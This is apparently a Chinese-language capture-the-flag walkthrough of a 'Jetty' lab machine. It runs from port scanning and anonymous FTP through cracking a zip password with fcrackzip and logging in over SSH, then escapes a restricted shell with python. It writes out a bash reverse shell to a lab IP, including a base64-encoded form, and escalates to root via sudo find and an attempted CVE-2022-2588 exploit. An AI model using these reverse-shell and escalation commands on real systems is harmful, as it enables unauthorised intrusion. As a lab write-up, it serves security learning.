vulhub Jetty
1.主机发现&端口扫描
arp-scan -l
nmap -Pn -p- -sV 192.168.1.8 --min-rate 10000
2.使用ftp匿名登录获取两个文件
ftp 192.168.1.8
Anonymous
lcd /home/kali/Desktop/jetty #指定下载路径
mget .
3.打开是一个Readme.txt和passssh.zip,但是需要密码
4.访问80,目录扫出来的东西不能用
5.都是404 Not Find
6.我怀疑是hosts没有解析对,就把目标转移到了80端口上
7.就是张图片,MISC一下将其将其下载下来,看了属性也没啥,binwalk也分离不出来什么东西,直接上010,还有就是这张图片不全
8.89 50 4E 47的文件头不是zip吗?不对。记错了,就是png的文件头
9.图片名字好特别,kraken.png试试看,是不是这个密码,kraken以及kraken.png都试了,发现不行,改改高度试试
10.470的十六进制是1D6
11.600的十六进制是258都没有找到,无语啦,后面试了题目描述中的信息也不对
12.对压缩包进行爆破
Fcrackzip
apt-get install fcrackzip
.gz的解压方式
gzip -d /usr/share/worklist/rocket.txt.gz
爆破压缩密码
fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u sshpass.zip
13.又学到一个新工具fcrackzip
,获取到密码:seahorse!
使用ssh
进行连接,感觉用户名没找对(Squiddie
)
14.试试看README.txt
的文件名,还是不对
15.无语啦,呜呜呜呜呜,还是去看一下writeup
,看了writeup
后我就更傻逼啦,解压得到的是文件啊,大兄弟,这个才是密码:Squ1d4r3Th3B3$t0fTh3W0rLd
16.一个大小写用户名,差点整的自信心都快没了
用户名:ssh squiddie@192.168.1.8 -p65507
密 码:Squ1d4r3Th3B3$t0fTh3W0rLd
17.根据题目提示就是提权,反弹个shell试试
bash -i >& /dev/tcp/192.168.1.7/8944 0>&1
Base64编码:
echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuNy84OTQ0IDA+JjE=|base64 -d|bash -I
加工一下
bash -c {echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuNy84OTQ0IDA+JjE=}|{base64 -d}|{bash -i}
18.bash
反弹shell
不行,根据提示整了个问号,发现可以执行python
,那就尝试使用python
提权,直接使用是不行的
python -c "import pty;pty.spawn('/bin/bash')
"
会被限制推出,直接上python
python
中途还是走了少许的弯路
import pty
pty.spawn("/bin/bash")
19.使用bash64
编码反弹shell还不行,直接使用即可,成功反弹shell
bash -i >& /dev/tcp/192.168.1.7/8944 0>&1
nc -lvvp 8944
20.查看其linux
的版本
uname -a
21.判断出来Linux
的内核版本,找了半天还是不行,直接工具扫吧
https://github.com/carlospolop/PEASS-ng/releases/tag/20230219
22.尝试使用CVE-2022-2588
进行提权
https://github.com/Markakd/CVE-2022-2588
23.赋予执行权限后直接上强度,但是很遗憾,没有成功,半天没有反应
24.尝试使用sudo -l
进行提权
25.出现了find
,尝试find
提权
find / -perm -u=s -type f 2>/dev/null
26.使用find
提权成功获取root
权限
27.方法二:使用writeup
中的办法提权
sudo -l
sudo /usr/bin/find -exec /bin/sh ; -quit
python3 -c “import pty;pty.spawn(‘/bin/bash’)”